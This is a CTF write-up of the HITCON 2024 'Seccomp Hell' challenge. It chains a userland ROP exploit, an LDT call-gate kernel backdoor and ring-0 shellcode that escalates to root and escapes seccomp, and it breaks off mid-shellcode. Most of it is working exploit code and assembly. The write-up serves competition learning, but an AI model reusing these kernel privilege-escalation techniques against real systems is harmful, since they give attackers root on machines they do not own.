HITCON CTF 2024 Quals - Seccomp Hell

Tue 16 July 2024 • 0x6fe1be2, cluosh • writeup

Seccomp Hell: userland, kernel and sandbox pwn

Seccomp Hell

Some challenges are userland pwns, others are kernel pwn, still others are sandbox escapes. In Seccomp Hell, you can get all three for free <3

Note: Try getting a full root shell for this challenge

Dist

TL;DR

You need to exploit three parts in this challenge

userland exploitation
backdoor that allows ROP chain that can be used to get arbitray code execution
kernel backdoor
backdoor that creates CALL GATE in the LDT (local descriptor table) to get kernel mode escalation and write kernel shellcode
sandbox escape
disable seccomp and escalate priviliges through kernel shellcode (corrupt current task_struct)

Overview

Guessing from the challenge description there will be at least three parts 1. userland exploitation 2. kernel exploitation 3. sandbox escape (seccomp)

The challenges consists of only three files:

dist
├── bzImage
├── initramfs.cpio.gz
└── run.sh

a simple run.sh script

#!/bin/bash

qemu-system-x86_64 \
    -cpu qemu64,+smap \
    -m 4096M \
    -kernel bzImage \
    -initrd initramfs.cpio.gz \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \
    -monitor /dev/null \
    -nographic \
    -netdev user,id=net0,hostfwd=tcp::22222-:22222 \
    -device e1000,netdev=net0 \
    -no-reboot

On important aspect is that +smep (Supervisor Mode Execution Protection) protection is missing ... forshadowing

Also here is an explaination of the Kernel paramters:

console=ttyS0
console output options, nothing interesting use context.newline = b'\r\n'
loglevel=3
reduce the amount of logging, can be increased or removed for easier debugging
oops=panic
immediatly panic on every kernel oops, means our kernel exploit needs to be precise
panic=-1
immediatly reboot on kernel panic, so we can't just corrupt in another socket connection (not that we wanted to do this neccessarly either)
pti=on
enable Page Table Isolation (so no cpu side channel)

we can decompress the initramfs.cpio.gz file using sth similar to this script.

Let's first look at the init script:

/init

#!/bin/sh

chown 0:0 -R /
chown 1000:1000 -R /home/user
chmod 4755 /bin/busybox

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mount -t devtmpfs none /dev
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
/sbin/mdev -s

chmod 666 /dev/ptmx

# network
insmod /usr/lib/modules/e1000.ko
ifup lo >& /dev/null
ifup eth0 >& /dev/null

# banner
cat /etc/banner

# kernel backdoor
insmod /usr/lib/modules/i_am_definitely_not_backdoor.ko
chmod 0666 /dev/i_am_definitely_not_backdoor

# user backdoor
echo 'server starting...'
setsid cttyhack setuidgid 1000 /bin/socat tcp-l:22222,reuseaddr,fork EXEC:"/home/user/i_am_not_backdoor.bin",pty,stderr

poweroff -f

ok we know that our vulnerable userland binary is /home/user/i_am_not_backdoor.bin and the vulnerable kernel module is /usr/lib/modules/i_am_definitely_not_backdoor.ko and accessable through /dev/i_am_definitely_not_backdoor

Test Environment

I actually used two of my tools to setup my test environment + vagd to exploit the userland binary + how2keap as an template for the kernel exploitation part

This is how my setup looks like

seccomp_hell
├── Makefile
├── bins
│   ├── i_am_definitely_not_backdoor.ko
│   └── i_am_not_backdoor.bin
├── exploit.py
├── libs
│   ├── pwn.h
│   ├── util.c
│   └── util.h
├── pwn.c
├── rootfs
│   ├── ...
├── scripts
│   ├── build.sh
│   ├── compress.sh
│   ├── decompress.sh
│   ├── gdbinit
│   └── start-qemu.sh
└── share
    ├── bzImage
    ├── flag.txt
    ├── initramfs.cpio.gz
    ├── rootfs.cpio.gz -> initramfs.cpio.gz
    └── run.sh

Userland

Lets first get some base information:

file:

bins/i_am_not_backdoor.bin: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=f4640517119249a926c7399197447b388e07807c, for GNU/Linux 3.2.0, with debug_info, not stripped

checksec:

[*] './i_am_not_backdoor.bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] GCC: (Debian 13.2.0-24) 13.2.0

seccomp-tools dump:

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x00000000  if (A != read) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0005
 0004: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0005: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0007
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0009
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0009: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x15 0x00 0x01 0x0000000a  if (A != mprotect) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x15 0x00 0x01 0x00000029  if (A != socket) goto 0015
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x15 0x00 0x01 0x0000002a  if (A != connect) goto 0017
 0016: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0017: 0x15 0x00 0x01 0x0000009a  if (A != modify_ldt) goto 0019
 0018: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0019: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0021
 0020: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0021: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0023
 0022: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0023: 0x06 0x00 0x00 0x00000000  return KILL

hmm, so interesting syscalls are allowed that are important for writing a assembly payload (mmap, mprotect), it also alows us to open the vulnerable kernel module (open). also for some reason a syscall called modify_ldt is whitelisted ... forshadowing

Stage 1: ROP Backdoor

At first glance the binary seems fine, but it actually corrupts the return ptr and jmps to a backdoor function using ROP:

  CALL       LAB_004018d1
LAB_004018d1:
  ADD        qword ptr [RSP]=>local_1e0,offset backdoor
  PUSH       RBP
  MOV        RBP,RSP
  LEAVE
  RET

the reversed backdoor code:

#define EXAMINE_SYSCALL \
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr)))

#define ALLOW_SYSCALL(name) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

#define KILL_PROCESS \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL)


void backdoor() {

  char rop[0];

  read(STDIN_FILENO,rop,0x98);
  close(STDIN_FILENO);
  close(STDOUT_FILENO);
  close(STDERR_FILENO);

    struct sock_filter seccomp_filter[] = {
        EXAMINE_SYSCALL,
        ALLOW_SYSCALL(read),
        ALLOW_SYSCALL(write),
        ALLOW_SYSCALL(open),
        ALLOW_SYSCALL(close),
        ALLOW_SYSCALL(mmap),
        ALLOW_SYSCALL(mprotect),
        ALLOW_SYSCALL(socket),
        ALLOW_SYSCALL(connect),
        ALLOW_SYSCALL(modify_ldt), // forshadowing
        ALLOW_SYSCALL(exit),
        ALLOW_SYSCALL(exit_group),
        KILL_PROCESS,
    };

  struct sock_fprog prog = {
      .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
      .filter = (struct sock_filter*)&seccomp_filter,
  };

  assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
  assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);
}

The backdoor can be summarized like this:

read BOF (rop chain) using read
close STDIN, STDOUT and STDERR
setup seccomp filter whitelist

lets take a look at the opened files, before they are closed:

ls -l /proc/$(pidof i_am_not_backdoor.bin)/fd
lrwx------    1 user     users           64 Jul 12 17:12 0 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 1 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 2 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 3 -> socket:[385]
lrwx------    1 user     users           64 Jul 12 17:12 4 -> socket:[386]
lrwx------    1 user     users           64 Jul 12 17:12 5 -> /dev/ttyS0

interesting, STD fds simply point to /dev/pts/0, so what happens if we just open it again ... we regain a working STDIN.

Note: /dev/pts/0 increments if there are multiple consecutive connections, this was briefly a problem, while the instance spawner was temporarly replaced with a shared instance.

Note: this approach was unintended, the intended solution opened a socket connection using the allowed socket and connect syscalls

so let's write a simple payload that reopens /dev/pts/0 and writes a new ROP payload into a known memory address and pivot there.

Stage 1:

linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b'' 

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
next(sret_gen)
next(sret_gen)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.raw(0x6fe1be2)
rop.rdi = 0x258 
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open 
rop.rsi = cst.O_RDWR
rop.call(SYSCALL_RET)

rop.rsi = PIVOT
# rop.rdx = 0x400
rop.call(0x0000000000428de0)

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(SYSCALL_RET)
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)

Stage 2: pivot ROP

Now that we have more controll over the rop chain, we can write a shellcode payload directly into memory, which we will need for further exploitation.

Stage 2:

linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER 
pivot.rdx = 0x1000
pivot.call(SYSCALL_RET)

pivot.call(LOADER)

pivot.exit(0)

chain = flat({
  0: std,
  0x10: b'STAGE 2',
  0x18: b'STAGE 3',
  0x20: b'FAIL',
  0x100: pivot
})

linfo("pivot len: 0x%x", len(chain))
sleep(1)

sl(chain)

Stage 3: loader

At this point we realized that certain characters, e.g. \n and \x04 (End of Transmission) can't be send, thats why we added another loader stage, that decodes the payload and writes it into executable memory.

payload = asm('int 3')
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
  xor rbx, rbx
LOAD:
  // get two characters (one byte)
  push 0
  {shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
  cmp rax, 2
  jl FAIL
  pop rax
  sub ah, 0x41 
  sub al, 0x41 
  shl al, 2
  shl al, 2
  shr rax, 2
  shr rax, 2
  mov BYTE PTR [rbx+{PAYLOAD}], al
  inc rbx
  cmp rbx, {PAYLOAD_LEN}
  jb LOAD

  // jmp to next stage
  mov rax, {PAYLOAD+0x20}
  jmp rax

FAIL:
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
  int 3
"""))

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
#  hex starting a 'A'
#  and least significant nibble first

payload_enc = b''
for b in payload:
  lo = (b & 0xf) + 0x41
  hi = ((b & 0xf0) >> 4) + 0x41
  payload_enc += bytes((lo, hi))


linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

it()

This basically finishes the userland exploitation stage

Kernel

Lets get into the interesting part the kernel. Let's reverse the backdoor.

simplified reversed backdoor:

int backdoor_open(void) { return 0 }
int backdoor_read(void) { return 0 }


int backdoor_write(void) {
  void* pte;    
  pte_t* pte_lock;

  // check if ldt exists (flip flops between two addresses)
  rc = follow_pte(const_pcpu_hot + 0x8f8, 0xffff880000010000,&pte,&pte_lock);
  if(rc != 0)
    return -EFAULT;

  // map ldt page for write
  char *ldt = vmap(pages,1,4, 0x8000000000000163);
  if (ldt == 0)
    return -EFAULT;

  // corrupt ldt entry 12

  ldt[0x60] = 0;
  ldt[0x61] = 0;

  ldt[0x65] = 0xec; // call gate
  ldt[0x66] = 0xc0 
  ldt[0x67] = 0;

  vunmap(ldt);

  return 0;
}

static struct file_operations BACKDOOR_fops = {
    .owner = THIS_MODULE,
    .open = backdoor_open,
    .read = backdoor_read,
    .write = backdoor_write,
};

static struct miscdevice backdoor_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "keap",
    .fops = &keap_fops,
};

int init_module(void) {
  misc_register(&backdoor_device);
  return 0;
}


void cleanup_module(void)
{
  misc_deregister(&backdoor_device);
}


INT backdoor_release(void)
{
  return 0;
}

module_init(init_module);
module_exit(cleanup_module);

so this basically checks if a kernel page exists at 0xffff880000010000, and if that is the case it overwrites sth at offset 0x60. Directly calling this kernel module fails, so how do we allocate something in this page. Well this is where the foreshadowing comes into place and the mysterious syscall modify_ldt actually allocates into this page.

Note: modify_ldt acutally flip flops the ldt pages between two address on every call, so we actually need to call modify_ldt twice for this to work.

So what is LDT and how does it work? LDT or Local Descriptor Table is a feature similar to GDT (Global Descriptor Table) that holds segment descriptors, that can be used to give certain memory pages additional permissons like read, write and execute, but also system functionality like call, trap and interrupt gates (e.g. interrupt gates are used for syscalls), but the system flag can't be set (on s clear) using modify_ldt. Additionall info can be found in the intel bible.

So lets understand a ldt entry, we can set the following options.

include/uapi/asm/ldt.h

struct user_desc {
    unsigned int  entry_number;
    unsigned int  base_addr;
    unsigned int  limit;
    unsigned int  seg_32bit:1;
    unsigned int  contents:2;
    unsigned int  read_exec_only:1;
    unsigned int  limit_in_pages:1;
    unsigned int  seg_not_present:1;
    unsigned int  useable:1;
#ifdef __x86_64__
    /*
     * Because this bit is not present in 32-bit user code, user
     * programs can pass uninitialized values here.  Therefore, in
     * any context in which a user_desc comes from a 32-bit program,
     * the kernel must act as though lm == 0, regardless of the
     * actual value.
     */
    unsigned int  lm:1;
#endif
};

that need to be translated into this struct.

include/asm/desc_defs.h:

struct desc_struct {
    u16 limit0;
    u16 base0;
    u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1;
    u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8;
} __attribute__((packed));

using this translation function.

include/asm/desc.h:

static inline void fill_ldt(struct desc_struct *desc, const struct user_desc *info)
{
    desc->limit0        = info->limit & 0x0ffff;

    desc->base0     = (info->base_addr & 0x0000ffff);
    desc->base1     = (info->base_addr & 0x00ff0000) >> 16;

    desc->type      = (info->read_exec_only ^ 1) << 1;
    desc->type         |= info->contents << 2;
    /* Set the ACCESS bit so it can be mapped RO */
    desc->type         |= 1;

    desc->s         = 1;
    desc->dpl       = 0x3;
    desc->p         = info->seg_not_present ^ 1;
    desc->limit1        = (info->limit & 0xf0000) >> 16;
    desc->avl       = info->useable;
    desc->d         = info->seg_32bit;
    desc->g         = info->limit_in_pages;

    desc->base2     = (info->base_addr & 0xff000000) >> 24;
    /*
     * Don't allow setting of the lm bit. It would confuse
     * user_64bit_mode and would get overridden by sysret anyway.
     */
    desc->l         = 0;
}

Like we mentioned we can't create a system segment (S flag is clear). So let's create an entry at offset 12 (0x60/8) and see what happens.

example:

  struct user_desc ldt = {
      .entry_number = 12, // max 0x1ffe
      .base_addr = 0x8899aabb, // 32 bits
      .limit = 0xdeeff, // 20 bits
      .contents=0, // 2 bits
      .read_exec_only=0, // 1 bit
      .seg_not_present=0, // 1 bit
      .useable=0, // 1 bit
      .seg_32bit=0, // 1 bit
      .limit_in_pages=0, // 1 bit
  };

  SYSCHK(syscallt(SYS_modify_ldt, 0x11, &ldt, sizeof(ldt)));

before corrupt:

0xffff880000010060:     0x880df399aabbeeff
0xffff880000010060:     0xeeff  0xaabb  0xf399  0x880d
0xffff880000010060:     0xff    0xee    0xbb    0xaa    0x99    0xf3    0x0d    0x88

desc_struct {
        .limit0        = 0xeeff   
        .limit1        = 0xd
        .base0         = 0xaabb 
        .base1         = 0x88
        .base2         = 0x99
        .type          = 0x3 (contents=0, ACCESS=1, read_exec_only=1)
        .s             = 1
        .dpl           = 3
        .p             = 1
        .avl           = 0
        .l             = 0
        .d             = 0
        .g             = 0
}

after corrupt:

0xffff880000010060:     0x00c0ec99aabb0000
0xffff880000010060:     0x0000  0xaabb  0xec99  0x00c0
0xffff880000010060:     0x00    0x00    0xbb    0xaa    0x99    0xec    0xc0    0x00

desc_struct {
        .limit0        = 0x0   
        .limit1        = 0x0
        .base0         = 0xaabb 
        .base1         = 0x00
        .base2         = 0x99
        .type          = 0xc (contents=3, ACCESS=0, read_exec_only=0)
        .s             = 0
        .dpl           = 3
        .p             = 1
        .avl           = 0
        .l             = 0
        .d             = 1
        .g             = 1
}

So looks like the backdoor actually creates a system segment for us, let's look at the table to understand what system segment type we have

System-Segment and Gate-Descriptor Types:

Type	Field				Description
Hex	11	10	9	8	32-Bit Mode	IA-32e Mode
0x0	0	0	0	0	Reserved	Upper 8 bytes of an 16-byte descriptor
0x1	0	0	0	1	16-bit TSS (Available)	Reserved
0x2	0	0	1	0	LDT	LDT
0x3	0	0	1	1	16-bit TSS (Busy)	Reserved
0x4	0	1	0	0	16-bit Call Gate	Reserved
0x5	0	1	0	1	Task Gate	Reserved
0x6	0	1	1	0	16-bit Interrupt Gate	Reserved
0x7	0	1	1	1	16-bit Trap Gate	Reserved
0x8	1	0	0	0	Reserved	Reserved
0x9	1	0	0	1	32-bit TSS (Available)	64-bit TSS (Available)
0xa	1	0	1	0	Reserved	Reserved
0xb	1	0	1	1	32-bit TSS (Busy)	64-bit TSS (Busy)
0xc	1	1	0	0	32-bit Call Gate	64-bit Call Gate
0xd	1	1	0	1	Reserved	Reserved
0xe	1	1	1	0	32-bit Interrupt Gate	64-bit Interrupt Gate
0xf	1	1	1	1	32-bit Trap Gate	64-bit Trap Gate

And the backdoor created a 64-bit Call Gate for us.

Stage 4: kernel backdoor, LDT call gate

A Call gate is a x86 feature that allows switching between privilige levels similar to syscalls (interrupt gates).

After realizing this we actually found this super cool writeup from hlt about his challenge one_byte from hxp 2022. That talks about using call gates to disable smap to get CPL 0 (ring 0) code execution.

Note: this wouldn't work if smep was enabled, because you can't temporarly disable smep without direct access to CR4 afaik

and with a few adjustions we can create a privilige escalation PoC:

diff from one_byte solution:

1c1,2
< // gcc -no-pie -nostdlib -Wl,--build-id=none -s pwn.S -o pwn
---
> // gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn
> 
91,94d91
< #define PERCPU_CURRENT 0x1fbc0
< #define STRUCT_TASK_STRUCT_REAL_CRED 0x0a78
< #define STRUCT_TASK_STRUCT_CRED 0x0a80
< #define STRUCT_CRED_USAGE 0x0
96c93,97
< // TODO: Check that &ring0 == 0x401000
---
> #define COMMIT_CREDS 0xfc820
> #define PREPARE_CREDS 0xfccd0
> 
> 
> // TODO: Check that &ring0 == 0xc00000
136,142c137,155
<     // Set current->cred and current->real_cred to init_task->cred
<     addq $KASLR_INIT_TASK, %rdx
<     movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx
<     addl $2, STRUCT_CRED_USAGE(%rdx)
<     movq %gs:PERCPU_CURRENT, %rax
<     movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax)
<     movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax)
---
>     // get .text base
>     subq $(KASLR_WRITE_TO+0x400000), %rdi
>     andq $(~0xfffff), %rdi
>     movq %rdi, %r15
>     
>     // privilige escalation
>     // crpt_cred = prepare_cred();
> 
>     lea PREPARE_CREDS(%r15), %rax
>     call *%rax
> 
>     // crpt_cred.uid = 0;
>     // crpt_cred.gid = 0;
>     movq %rax, %rdi
>     movq $0, 8(%rdi)
> 
>     // commit_creds(crpt_cred);
>     lea COMMIT_CREDS(%r15), %rax
>     call *%rax
204c217
< asciz module_path, "/dev/one_byte"
---
> asciz module_path, "/dev/i_am_definitely_not_backdoor"
256c269,270
<     exit_64 $0
---
>     movq $0, %rdi
>     check_syscall_64 $SYS_exit
258a273
>

privilige escalation PoC:

// gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn


#include <linux/mman.h>
#include <sys/syscall.h>

.pushsection .text.1
.code64
__syscall_64_fail.L:
    negl %eax
    movl $SYS_exit_group, %eax
    syscall
    ud2
.popsection

.macro check_syscall_64 nr:req, res=%rax
    movl \nr, %eax
    syscall
    test \res, \res
    js __syscall_64_fail.L
.endm

.macro var name:req
    .pushsection .data
    .balign 8
    .local \name
    \name:
.endm

.macro endvar name:req
    .local end_\name
    end_\name:
    .eqv sizeof_\name, end_\name - \name
    .popsection
.endm

.macro asciz name:req, data:vararg
    var \name
        .asciz \data
    endvar \name
.endm

.macro far_ptr name:req, selector:req, offset:req
    var \name
        .int \offset
        .short \selector
    endvar \name
.endm

.macro fn name:req
    .text
    .code64
    .global \name
    \name:
.endm

// <*/fcntl.h> are all C-only
#define O_WRONLY 1

// Yes, ordering in kernel and user mode are different, blame AMD/Intel.
#define __KERNEL_CS   (2 * 8)

// For 4-level paging
#define LDT_BASE_ADDR 0xffff880000000000
#define LDT_STRIDE 0x10000
#define PTI_SWITCH_MASK 0x1000

// Arbitrary constants
#define STACK_SIZE 0x80000

// Selectors for the LDT have bit 2 set. Also RPLs
#define LDT_SELECTOR 0b100
#define RPL_KERNEL   0b000
#define RPL_USER     0b011
#define TARGET_ENTRY 12
#define TARGET_SELECTOR ((TARGET_ENTRY << 3) | LDT_SELECTOR | RPL_USER)

// With one descriptor (i.e. a one-byte write): modifiable bits in cs_offset:
//   0x0000000000401000 <- ring0
//   0x00000000ffdfffff
//             |||\___/
//             |||  \____ limit
//             \/\_______ G, D, 0, AV
//              \________ base_addr[31:24]

#define MSR_LSTAR 0xc0000082
#define KASLR_WRITABLE 0xa00000
#define KASLR_LSTAR 0xa00010
#define KASRL_WRITABLE_END 0xc00000
#define KASLR_WRITE_TO 0xbad000
#define KASLR_INIT_TASK 0x1613940

#define COMMIT_CREDS 0xfc820
#define PREPARE_CREDS 0xfccd0


// TODO: Check that &ring0 == 0xc00000
fn ring0
    // Disable interrupts (interrupts cause double faults right now)
    cli

    // Read LSTAR to bypass KASLR
    movl $MSR_LSTAR,  %ecx
    rdmsr
    shlq $32, %rdx
    orq %rax, %rdx
    subq $KASLR_LSTAR, %rdx
    movq %rdx, %rbp

    // Disable WP
    movq %cr0, %r8
    andq $(~(1 << 16)), %r8
    movq %r8, %cr0

    // Copy stage 2 to the mapped kernel entry point
    movq %rbp, %rdi
    addq $KASLR_WRITE_TO, %rdi
    movq %rdi, %r15
    leaq ring0_stage2(%rip), %rsi
    movl $sizeof_ring0_stage2, %ecx
    rep movsb

    // Jump there.
    jmp *%r15

var ring0_stage2
    // Get access to per-cpu variables (current, mostly) via swapgs
    swapgs

    // Get the current page table.
    movq %cr3, %rbx

    // Switch to the kernel page table.
    andq $(~PTI_SWITCH_MASK), %rbx
    movq %rbx, %cr3

    // get .text base
    subq $(KASLR_WRITE_TO+0x400000), %rdi
    andq $(~0xfffff), %rdi
    movq %rdi, %r15

    // privilige escalation
    // crpt_cred = prepare_cred();

    lea PREPARE_CREDS(%r15), %rax
    call *%rax

    // crpt_cred.uid = 0;
    // crpt_cred.gid = 0;
    movq %rax, %rdi
    movq $0, 8(%rdi)

    // commit_creds(crpt_cred);
    lea COMMIT_CREDS(%r15), %rax
    call *%rax

    // Swap back
    swapgs

    // Switch the page table back around
    orq $PTI_SWITCH_MASK, %rbx
    movq %rbx, %cr3

    // Build an `iret` stackframe rather than a `ret far` stack frame.
    popq %r8 // => %rip
    popq %r9 // => %cs
    pushfq
    orq $(1 << 9), (%rsp) // Set IF in the new RFLAGS (like sti)
    pushq %r9
    pushq %r8
    iretq
endvar ring0_stage2

var user_desc
    // base2 (base_addr[31:24]) == cs_offset[31:24]
    // limit_in_pages           == cs_offset[23]
    // seg_32bit                == cs_offset[22]
    // NB: Because lm is ignored, cs_offset[21] must be 0
    // useable                  == cs_offset[20]
    // limit1 (limit[19:16])    == cs_offset[19:16]
    // flags0                   == (arbitrary, will be overwritten later)
    // base1 (base_addr[23:16]) == (ignored entirely)
    // base0 (base_addr[15:0])  == __KERNEL_CS
    // limit0 (limit[15:0])     == cs_offset[15:0]
    .int TARGET_ENTRY // entry_number
    .int __KERNEL_CS  // base_addr
    .int 0x01000      // limit
    .int 0b00000001   // flags (int because of padding - only the low byte is actually used)
    //     |||||\/\____  .seg_32bit (D) (must be 1 for set_thread_area)
    //     ||||| \_____  .contents (top 2 bits of type, must be 00 or 01 for set_thread_area)
    //     ||||\_______  .read_exec_only (!R)
    //     |||\________  .limit_in_pages (G)
    //     ||\_________  .seg_not_present (!P)
    //     |\__________  .useable (AV)
    //     \___________  .lm (will be ignored)
endvar user_desc

// On the next descriptor, the CPU wants type == 0 here (or you get a #GP(selector)).
// We can't achieve this without another write, but here's what the values mean.
//     base2 (base_addr[31:24]) == (ignored)
//     flags1                   == (ignored)
//     limit1 (limit[19:16])    == (ignored)
//     flags0                   == (mostly ignored, except for the type)
//     base1 (base_addr[23:16]) == (ignored)
//     base0 (base_addr[15:0])  == cs_offset[63:48]
//     limit0 (limit[15:0])     == cs_offset[47:32]

var high_desc
    // We need a placeholder so that the LDT is long enough (i.e. contains the cleared descriptor
    // above the target descriptor).
    .int TARGET_ENTRY + 2 // entry_number
    .int 0xffff           // base_addr
    .int 0xffff           // limit
    .int 0b00111000       // flags
endvar high_desc

asciz module_path, "/dev/i_am_definitely_not_backdoor"
asciz shell_path, "/bin/sh"

var shell_argv
    .quad shell_path
    .quad 0
endvar shell_argv

var module_message
    .quad LDT_BASE_ADDR + LDT_STRIDE + (TARGET_ENTRY * 8) + 5
    .byte 0b11101100
endvar module_message

.macro modify_ldt desc:req
    movl $sizeof_\desc, %edx
    leaq \desc(%rip), %rsi
    movl $0x11, %edi
    check_syscall_64 $SYS_modify_ldt, %eax // Result is zero-extended from 32 bits for weird ABI reasons.
.endm

fn _start
    // Open device
    xorl %edx, %edx
    movl $O_WRONLY, %esi
    leaq module_path(%rip), %rdi
    check_syscall_64 $SYS_open
    movl %eax, %r15d

    // "stac" in CPL3
    pushfq
    orq $(1 << 18), (%rsp)
    popfq

    // Update the LDT
    modify_ldt user_desc
    modify_ldt high_desc

    // Trigger the overwrite
    movl $sizeof_module_message, %edx
    leaq module_message(%rip), %rsi
    movl %r15d, %edi
    check_syscall_64 $SYS_write

    // Go to CPL 0
    far_ptr gate_target, TARGET_SELECTOR, 0xdead8664
    lcall *(gate_target)

    // Get a shell
    leaq shell_path(%rip), %rdi
    leaq shell_argv(%rip), %rsi
    xorl %edx, %edx
    check_syscall_64 $SYS_execve
    movq $0, %rdi
    check_syscall_64 $SYS_exit

// vim:syntax=asm:

so let's rewrite this into a python payload.

Stage 4:

trampolin = asm('int 3')

far_func = p64(0x67dead8664)

payload = bytearray(far_func+seccomp+asm(f"""
  {shc.echo("STAGE 4")}

  {shc.echo("[+] INIT\n")}

  {shc.pushstr("/dev/i_am_definitely_not_backdoor")}
  {shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
  cmp rax, 0
  jl FAIL

  mov rbx, rax
  {shc.echo("[+] backdoor fd: ")}
  {shc.itoa('rbx')}
  {shc.strlen('rsp')}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

  {shc.echo("\n[+] START\n")}

  // disable SMAP
  {shc.echo("[+] 'stac' in CPL3\n")}
  pushfq
  or         QWORD PTR [rsp],0x40000
  popfq

  {shc.echo("[+] modify_ldt user\n")}
  mov        rax, 0x100001000
  push       rax
  mov        rax, 0x100000000c
  push       rax
  mov        rsi, rsp

  mov        edx,0x10
  mov        edi,0x11
  mov        eax,{cst.SYS_modify_ldt}
  syscall
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] modify_ldt high\n")}

  mov        rax, 0x380000FFFF
  push       rax
  mov        rax, 0xFFFF0000000E
  push       rax
  mov        rsi, rsp

  mov        edx,0x10
  mov        edi,0x11
  mov        eax,{cst.SYS_modify_ldt}

  syscall
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] write to backdoor\n")}
  {shc.pushstr('TEST')}
  mov rsi, rsp
  {shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] cpy trampolin\n")}
  {shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
  lea rsi, [rip+TRAMPOLIN]
  {shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

  // call CALL GATE for privilige escalation
  {shc.echo("[+] go to CPL 0\n")}
  call   FWORD PTR ds:{PIVOT-0xa6b00}

  // should be root
  {shc.echo("[+] spawning shell\n")}
  {shc.sh()}

  {shc.echo("[+] END\n")}
  int 3

FAIL:
  mov rbx, rax
  neg rbx
  {shc.echo("[-] errno: ")}
